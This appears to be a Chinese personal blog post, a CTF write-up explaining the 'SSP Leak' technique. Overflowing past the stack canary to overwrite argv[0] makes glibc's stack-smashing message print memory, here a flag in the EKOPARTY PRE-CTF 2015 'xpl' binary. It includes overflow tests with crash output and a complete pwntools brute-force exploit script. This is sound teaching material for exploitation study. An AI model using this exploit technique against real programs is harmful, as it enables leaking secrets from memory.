<!DOCTYPE html>
<html  lang="zh">
<head>
    <meta charset="utf-8" />

<meta name="generator" content="Hexo 3.9.0" />

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

<title>Bypassing Canary——SSP Leak - Jon Tsang&#39;Blog</title>


    <meta name="description" content="SSP Leak即Stack Smashing Protect Leak ，从字面意思理解，主要作用是泄漏信息，而非getshell。不过有些题目中flag已经被读取存在内存中了，这时我们就可以通过SSP Leak将flag泄漏出来。 该方法需要我们触发Stack Smashing Protect，即覆盖掉Canary，进入函数__stack_chk_fail中后，将进一步调用__fortify_">
<meta name="keywords" content="CTF,pwn,Canary,StackOverflow">
<meta property="og:type" content="article">
<meta property="og:title" content="Bypassing Canary——SSP Leak">
<meta property="og:url" content="https://jontsang.github.io/post/36591.html">
<meta property="og:site_name" content="Jon Tsang&#39;Blog">
<meta property="og:description" content="SSP Leak即Stack Smashing Protect Leak ，从字面意思理解，主要作用是泄漏信息，而非getshell。不过有些题目中flag已经被读取存在内存中了，这时我们就可以通过SSP Leak将flag泄漏出来。 该方法需要我们触发Stack Smashing Protect，即覆盖掉Canary，进入函数__stack_chk_fail中后，将进一步调用__fortify_">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://jontsang.github.io/images/og_image.png">
<meta property="og:updated_time" content="2019-08-28T01:39:25.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Bypassing Canary——SSP Leak">
<meta name="twitter:description" content="SSP Leak即Stack Smashing Protect Leak ，从字面意思理解，主要作用是泄漏信息，而非getshell。不过有些题目中flag已经被读取存在内存中了，这时我们就可以通过SSP Leak将flag泄漏出来。 该方法需要我们触发Stack Smashing Protect，即覆盖掉Canary，进入函数__stack_chk_fail中后，将进一步调用__fortify_">
<meta name="twitter:image" content="https://jontsang.github.io/images/og_image.png">







<link rel="icon" href="/images/favicon.svg">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.4.1/css/all.min.css">
<link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css">


    
    
    
    <style>body>.footer,body>.navbar,body>.section{opacity:0}</style>
    

    
    
    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">
    

    
    

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">


    
    
    
    

<link rel="stylesheet" href="/css/back-to-top.css">


    
    

    
    
    
    

    
    
<link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

    
    
    
        <script async="" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    

    


<link rel="stylesheet" href="/css/style.css">
</head>
<!-- <body class="is-2-column"> -->
<body class="is-3-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/logo.svg" alt="Bypassing Canary——SSP Leak" height="28">
            
            </a>
        </div>
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item"
                href="/">主页</a>
                
                <a class="navbar-item"
                href="/archives">归档</a>
                
                <a class="navbar-item"
                href="/categories">分类</a>
                
                <a class="navbar-item"
                href="/tags">标签</a>
                
                <a class="navbar-item"
                href="/about">关于</a>
                
            </div>
            
            <div class="navbar-end">
                
                    
                    
                    <a class="navbar-item" target="_blank" title="Download on GitHub" href="https://github.com/JonTsang">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                    
                
                
                <a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;">
                    <i class="fas fa-list-ul"></i>
                </a>
                
                
                <a class="navbar-item search" title="搜索" href="javascript:;">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>
    
    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-9-widescreen has-order-2 column-main"><div class="card">
    
    <div class="card-content article ">
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2018-11-16T05:05:12.000Z">2018-11-16</time>
                
                <div class="level-item">
                <a class="has-link-grey -link" href="/categories/CTF/">CTF</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    
                    
                    7 分钟 读完 (大约 983 个字)
                </span>
                
                
                <span class="level-item has-text-grey" id="busuanzi_container_page_pv">
                    <i class="far fa-eye"></i>
                    <span id="busuanzi_value_page_pv">0</span>次访问
                </span>
                
            </div>
        </div>
        
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                Bypassing Canary——SSP Leak
            
        </h1>
        <div class="content">
            <p>SSP Leak即Stack Smashing Protect Leak ，从字面意思理解，主要作用是泄漏信息，而非getshell。不过有些题目中flag已经被读取存在内存中了，这时我们就可以通过SSP Leak将flag泄漏出来。</p>
<p>该方法需要我们触发Stack Smashing Protect，即覆盖掉Canary，进入函数<code>__stack_chk_fail</code>中后，将进一步调用<code>__fortify_fail_abort</code>打印<strong>stack smashing detected *</strong>: ./XXX terminated**，其中的程序名从<code>__libc_argv[0]</code>取得。</p>
<a id="more"></a>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment">//glibc-2.29 debug/stack_chk_fail.c</span></span><br><span class="line"><span class="hljs-keyword">void</span></span><br><span class="line">__attribute__ ((noreturn))</span><br><span class="line">__stack_chk_fail (<span class="hljs-keyword">void</span>)</span><br><span class="line">&#123;</span><br><span class="line">  __fortify_fail_abort (<span class="hljs-literal">false</span>, <span class="hljs-string">"stack smashing detected"</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment">//glibc-2.29 debug/fortify_fail.c</span></span><br><span class="line"><span class="hljs-keyword">void</span></span><br><span class="line">__attribute__ ((noreturn))</span><br><span class="line">__fortify_fail_abort (<span class="hljs-keyword">_Bool</span> need_backtrace, <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *msg)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="hljs-comment">/* The loop is added only to keep gcc happy.  Don't pass down</span></span><br><span class="line"><span class="hljs-comment">     __libc_argv[0] if we aren't doing backtrace since __libc_argv[0]</span></span><br><span class="line"><span class="hljs-comment">     may point to the corrupted stack.  */</span></span><br><span class="line">  <span class="hljs-keyword">while</span> (<span class="hljs-number">1</span>)</span><br><span class="line">    __libc_message (need_backtrace ? (do_abort | do_backtrace) : do_abort,</span><br><span class="line">		    <span class="hljs-string">"*** %s ***: %s terminated\n"</span>,</span><br><span class="line">		    msg,</span><br><span class="line">		    (need_backtrace &amp;&amp; __libc_argv[<span class="hljs-number">0</span>] != <span class="hljs-literal">NULL</span></span><br><span class="line">		     ? __libc_argv[<span class="hljs-number">0</span>] : <span class="hljs-string">"&lt;unknown&gt;"</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>再来看看一个程序栈的布局，传入main函数的argv位于栈的高地址处，只要溢出的长度足够覆盖它，我们就可以控制前面打印信息。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190827163306.png" alt></p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190827163253.png" alt></p>
<p>最后注意该方法还要满足以下条件：</p>
<ul>
<li><p>stderr被重定向到套接字，因为libc将调试信息写入了<code>STDERR_FILENO</code></p>
</li>
<li><p>在受SSP保护的函数中可溢出的范围足够到达栈顶部的<code>argv[0]</code></p>
</li>
</ul>
<p>OK，现在来看看如何应用SSP Leak~</p>
<h3 id="EKOPARTY-PRE-CTF-2015-xpl"><a href="#EKOPARTY-PRE-CTF-2015-xpl" class="headerlink" title="EKOPARTY PRE-CTF 2015 xpl"></a>EKOPARTY PRE-CTF 2015 xpl</h3><figure class="highlight shell hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">$</span> checksec xpl</span><br><span class="line">[*] '/root/xpl'</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x400000)</span><br></pre></td></tr></table></figure>
<p>下面IDA的反编译有些问题，<code>flag</code>显然应该是上面<code>printf</code>的参数，不过对分析的影响不大，查看汇编指令就可以发现问题。</p>
<p>在反编译代码中，可以很明显的看到<code>read(0LL, &amp;v6, 1024LL);</code>存在栈溢出，<code>v6</code>的栈空间大小只有0x90-0x8=0x88。</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">int</span> __<span class="hljs-function">cdecl <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-keyword">int</span> argc, <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> **argv, <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="hljs-function"></span>&#123;</span><br><span class="line">  __int64 v4; <span class="hljs-comment">// [rsp+18h] [rbp-118h]</span></span><br><span class="line">  <span class="hljs-keyword">char</span> flag; <span class="hljs-comment">// [rsp+20h] [rbp-110h]</span></span><br><span class="line">  <span class="hljs-keyword">char</span> v6; <span class="hljs-comment">// [rsp+A0h] [rbp-90h]</span></span><br><span class="line">  <span class="hljs-keyword">unsigned</span> __int64 v7; <span class="hljs-comment">// [rsp+128h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v7 = __readfsqword(<span class="hljs-number">0x28</span>u);</span><br><span class="line">  putenv(<span class="hljs-string">"LIBC_FATAL_STDERR_=1"</span>, argv, envp);</span><br><span class="line">  v4 = fopen64((__int64)<span class="hljs-string">"flag.txt"</span>, (__int64)<span class="hljs-string">"r"</span>);</span><br><span class="line">  <span class="hljs-keyword">if</span> ( v4 )</span><br><span class="line">  &#123;</span><br><span class="line">    fgets(&amp;flag, <span class="hljs-number">32L</span>L, v4);</span><br><span class="line">    fclose(v4);</span><br><span class="line">    <span class="hljs-built_in">printf</span>((<span class="hljs-keyword">unsigned</span> __int64)<span class="hljs-string">"Interesting data loaded at %p\nYour username? "</span>);</span><br><span class="line">    fflush(<span class="hljs-number">0L</span>L, &amp;flag);</span><br><span class="line">    read(<span class="hljs-number">0L</span>L, &amp;v6, <span class="hljs-number">1024L</span>L);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="hljs-keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Error leyendo datos"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190827154944.png" alt></p>
<p>测试一下是否和分析的一样：</p>
<figure class="highlight shell hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">$</span> python -c 'print "A"*0x88' | ./xpl</span><br><span class="line">Interesting data loaded at 0x7ffd31994cf0</span><br><span class="line">Your username? *** stack smashing detected ***: ./xpl terminated</span><br><span class="line">[1]    3697 done                 python -c 'print "A"*0x88' |</span><br><span class="line">       3698 abort (core dumped)  ./xpl</span><br></pre></td></tr></table></figure>
<p>而程序打印出的”Interesting data loaded at 0x7ffd31994cf0“和明显暗示我们要使用SSP Leak的方法，至少我个人觉得如此。。所以我们继续测试看到大的输入能覆盖掉<code>__libc_argv[0]</code></p>
<figure class="highlight shell hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">$</span> python -c 'print "A"*0x150' | ./xpl</span><br><span class="line">Interesting data loaded at 0x7ffd5b30aad0</span><br><span class="line">Your username? *** stack smashing detected ***: ./xpl terminated</span><br><span class="line">[1]    3712 done                 python -c 'print "A"*0x150' |</span><br><span class="line">       3713 abort (core dumped)  ./xpl</span><br><span class="line"></span><br><span class="line"><span class="hljs-meta">$</span> python -c 'print "A"*0x200' | ./xpl</span><br><span class="line">Interesting data loaded at 0x7ffe8138bbd0</span><br><span class="line">Your username? [1]    3727 done                              python -c 'print "A"*0x200' |</span><br><span class="line">       3728 segmentation fault (core dumped)  ./xpl</span><br><span class="line"></span><br><span class="line"><span class="hljs-meta">$</span> python -c 'print "A"*0x175' | ./xpl</span><br><span class="line">Interesting data loaded at 0x7ffe6110ddf0</span><br><span class="line">Your username? *** stack smashing detected ***: ./xpl terminated</span><br><span class="line">[1]    3742 done                 python -c 'print "A"*0x175' |</span><br><span class="line">       3743 abort (core dumped)  ./xpl</span><br></pre></td></tr></table></figure>
<p>OK，现在我们大概确定了一个范围了，一个一个大小试太过麻烦，所以现在可以开始写exp爆破一下。向程序发送的payload应该是<code>&#39;A&#39;*i +flag_addr</code>的形式，完整exp如下：</p>
<figure class="highlight python hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment">#!/usr/bin/python</span></span><br><span class="line"><span class="hljs-comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *</span><br><span class="line"><span class="hljs-keyword">from</span> time <span class="hljs-keyword">import</span> sleep</span><br><span class="line"></span><br><span class="line">context.os = <span class="hljs-string">'linux'</span></span><br><span class="line">context.terminal = [<span class="hljs-string">'tmux'</span>, <span class="hljs-string">'splitw'</span>, <span class="hljs-string">'-h'</span>]</span><br><span class="line"><span class="hljs-comment"># ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']</span></span><br><span class="line">context.log_level = <span class="hljs-string">'INFO'</span></span><br><span class="line"></span><br><span class="line">bin_path = <span class="hljs-string">'./xpl'</span></span><br><span class="line">binary = ELF(bin_path)</span><br><span class="line"></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">debug</span><span class="hljs-params">(command=<span class="hljs-string">''</span>)</span>:</span></span><br><span class="line">    gdb.attach(p, command)</span><br><span class="line"></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">exploit</span><span class="hljs-params">()</span>:</span></span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">0x175</span>, <span class="hljs-number">0x200</span>):</span><br><span class="line">        p = process(bin_path)</span><br><span class="line">        recv = p.recvline()</span><br><span class="line">        <span class="hljs-comment"># 取出打印消息中”Interesting data loaded at 0xxxxxxxxxx“的地址</span></span><br><span class="line">        p.sendline(<span class="hljs-string">"A"</span>*i+p64(int(recv.split()[<span class="hljs-number">4</span>],<span class="hljs-number">16</span>)))</span><br><span class="line">        </span><br><span class="line">        log.info(<span class="hljs-string">"Length: "</span> + hex(i))</span><br><span class="line">        log.info(recv)</span><br><span class="line">        <span class="hljs-keyword">try</span>:</span><br><span class="line">            <span class="hljs-keyword">print</span> p.recvline()</span><br><span class="line">        <span class="hljs-keyword">except</span>:</span><br><span class="line">            <span class="hljs-keyword">pass</span></span><br><span class="line">        sleep(<span class="hljs-number">0.1</span>)</span><br><span class="line"></span><br><span class="line"><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:</span><br><span class="line">    <span class="hljs-keyword">if</span> len(sys.argv) == <span class="hljs-number">1</span>:</span><br><span class="line">        <span class="hljs-keyword">global</span> p</span><br><span class="line">        <span class="hljs-comment">#p = process(executable=bin_path, argv=[bin_path])</span></span><br><span class="line">    <span class="hljs-keyword">else</span>:</span><br><span class="line">        <span class="hljs-comment">#p = remote(sys.argv[1], int(sys.argv[2]))</span></span><br><span class="line">    exploit()</span><br></pre></td></tr></table></figure>
<p>EXP执行结果：</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190827154334.png" alt></p>

        </div>
        <!-- 文章结尾添加版权声明 从这里开始 -->
        
        <ul class="post-copyright">
        <li><strong>本文标题：</strong><a href="https://jontsang.github.io/post/36591.html">Bypassing Canary——SSP Leak</a></li>
        <li><strong>本文作者：</strong><a href="https://jontsang.github.io">Jon Tsang</a></li>
        <!-- <li><strong>本文链接：</strong><a href="https://jontsang.github.io/post/36591.html">https://jontsang.github.io/post/36591.html</a></li> -->
        <li><strong>发布时间：</strong>2018-11-16</li>
        <li><strong>版权声明：</strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！</li>
        </ul>
        
        <!-- 文章结尾添加版权声明 到这里结束 -->
        
        <div class="level is-size-7 is-uppercase">
            <div class="level-start">
                <div class="level-item">
                    <span class="is-size-6 has-text-grey has-mr-7">#</span>
                    <a class="has-link-grey -link" href="/tags/CTF/">CTF</a>, <a class="has-link-grey -link" href="/tags/Canary/">Canary</a>, <a class="has-link-grey -link" href="/tags/StackOverflow/">StackOverflow</a>, <a class="has-link-grey -link" href="/tags/pwn/">pwn</a>
                </div>
            </div>
        </div>
        
        
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3>
        <div class="buttons is-centered">
            
                
<a class="button is-info donate">
    <span class="icon is-small">
        <i class="fab fa-alipay"></i>
    </span>
    <span>支付宝</span>
    <div class="qrcode"><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190822175230.jpg" alt="支付宝"></div>
</a>

                
                
<a class="button is-success donate">
    <span class="icon is-small">
        <i class="fab fa-weixin"></i>
    </span>
    <span>微信</span>
    <div class="qrcode"><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190822175230.jpg" alt="微信"></div>
</a>

                
        </div>
    </div>
</div>



<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/post/6c314f.html">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">AFL漏洞挖掘技术漫谈：使用AFL开始第一Fuzzing</span>
            </a>
        </div>
        
        
        <div class="level-end">
            <a class="level level-item has-link-grey  article-nav-next" href="/post/34549.html">
                <span class="level-item">Bypassing Canary——hijack __stack_chk_fail</span>
                <i class="level-item fas fa-chevron-right"></i>
            </a>
        </div>
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="title is-5 has-text-weight-normal">评论</h3>
        
<div id="valine-thread" class="content"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='//unpkg.com/valine/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#valine-thread' ,
        notify: true,
        verify: false,
        app_id: '2oTcdkk2ubE6P9DwKwwTTlDK-gzGzoHsz',
        app_key: 'z1TMyiu5W0zvLI3qKElhM6uU',
        placeholder: '不用注册也可以评论哟~支持Markdown~'
    });
</script>

    </div>
</div>
</div>
                




<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-1 column-left is-sticky">
    
        
<div class="card widget" id="toc">
    <div class="card-content">
        <div class="menu">
            <h3 class="menu-label">
                目录
            </h3>
            <ul class="menu-list"><li>
        <a class="is-flex" href="#EKOPARTY-PRE-CTF-2015-xpl">
        <span class="has-mr-6">1</span>
        <span>EKOPARTY PRE-CTF 2015 xpl</span>
        </a></li></ul>
        </div>
    </div>
</div>

    
    
        <div class="column-right-shadow is-hidden-widescreen is-sticky">
        
        </div>
    
</div>

                
            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <a class="footer-logo is-block has-mb-6" href="/">
                
                    <img src="/images/logo.svg" alt="Bypassing Canary——SSP Leak" height="28">
                
                </a>
                <p class="is-size-7">
                &copy; 2019 Jon Tsang&nbsp;
                <!--Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & <a
                        href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>-->
                
                <br>
                <span id="busuanzi_container_site_uv">
                共<span id="busuanzi_value_site_uv">0</span>个访客
                </span>
                
                </p>
            </div>
            <div class="level-end">
            
                <div class="field has-addons is-flex-center-mobile has-mt-5-mobile is-flex-wrap is-flex-middle">
                
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Creative Commons" href="https://creativecommons.org/">
                        
                        <i class="fab fa-creative-commons"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/">
                        
                        <i class="fab fa-creative-commons-by"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                </p>
                
                </div>
            
            </div>
        </div>
    </div>
</footer>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("zh-CN");</script>

<script>
var IcarusThemeSettings = {
    article: {
        highlight: {
            clipboard: true,
            fold: 'unfolded'
        }
    }
};
</script>


    <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script>



    
    
    
    <script src="/js/animation.js"></script>
    

    
    
    
    <script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
    <script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
    <script src="/js/gallery.js" defer></script>
    

    
    

<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>


    
    
<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
});
</script>

    
    

<a id="back-to-top" title="回到顶端" href="javascript:;">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>


    
    

    
    
    
    

    
    
    
    
    

    


<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="想要查找什么..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(无标题)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
</body>
</html>